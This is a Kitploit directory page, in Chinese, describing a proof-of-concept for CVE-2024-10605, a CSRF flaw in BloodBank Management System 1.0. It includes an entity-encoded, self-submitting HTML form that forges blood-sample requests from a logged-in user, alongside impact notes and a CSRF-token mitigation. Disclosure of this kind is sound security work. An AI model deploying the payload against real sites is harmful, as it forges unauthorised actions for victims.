Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-10605 — CVE-2024-10605 的概念验证,这是 BloodBank Management System 1.0 中的一个 CSRF 漏洞,允许未经授权的血液样本请求。 | Kitploit
工具/GitHubGitHub/bevennyamande/cve-2024-10605
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubbevennyamande/cve-2024-10605

CVE-2024-10605

CVE-2024-10605 的概念验证,这是 BloodBank Management System 1.0 中的一个 CSRF 漏洞,允许未经授权的血液样本请求。

查看仓库
11年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

受影响版本:

  • BloodBank 管理系统: 1.0

漏洞信息:

  • 漏洞类型: 跨站请求伪造(CSRF)
  • 严重性: 高
  • 状态: 未修补

脆弱端点:

  • 路径: file/request.php

漏洞描述:

端点 /file/request.php 存在跨站请求伪造漏洞,允许远程用户在已登录的 接收者 账户下,从所选医院的可用血液样本中发起 血液样本 请求。

成功利用可导致代表受害者执行 未授权操作。此外,可通过访问带有该载荷的恶意网站进行利用。


概念验证(PoC):

以下是 CSRF 攻击 PoC 示例,从已登录的 接收者 账户发起 血液样本 请求:

root@kitploit:~

<html>
    <head>
        <title>CSRF PoC</title>
    </head>
    <body>
        <form action="http://&#108;&#111;&#99;&#97;&#108;&#104;&#111;&#115;&#116;&#46;&#108;&#111;&#99;&#97;&#108;&#47;&#98;&#108;&#111;&#111;&#100;&#98;&#97;&#110;&#107;&#47;&#102;&#105;&#108;&#101;&#47;&#114;&#101;&#113;&#117;&#101;&#115;&#116;&#46;&#112;&#104;&#112;" method="POST" enctype="application/x-www-form-urlencoded">
            <input name="&#98;&#105;&#100;" value="&#49;&#54;">
            <input name="&#104;&#105;&#100;" value="&#51;">
            <input name="&#98;&#103;" value="&#66;&#45;">
            <input name="&#114;&#101;&#113;&#117;&#101;&#115;&#116;" value="&#82;&#101;&#113;&#117;&#101;&#115;&#116;&#43;&#83;&#97;&#109;&#112;&#108;&#101;">
        </form>
        <script>
            document.querySelector("form").submit();
        </script>
    </body>
</html>






影响:

  • 数据篡改: 攻击者可以修改向用户展示的内容。
  • 声誉损害: 用户可能因恶意行为而对系统失去信任。

缓解建议:

  1. 使用 CSRF 令牌 实施机制以阻止跨域访问,或在请求中加入 csrf tokens

下载工具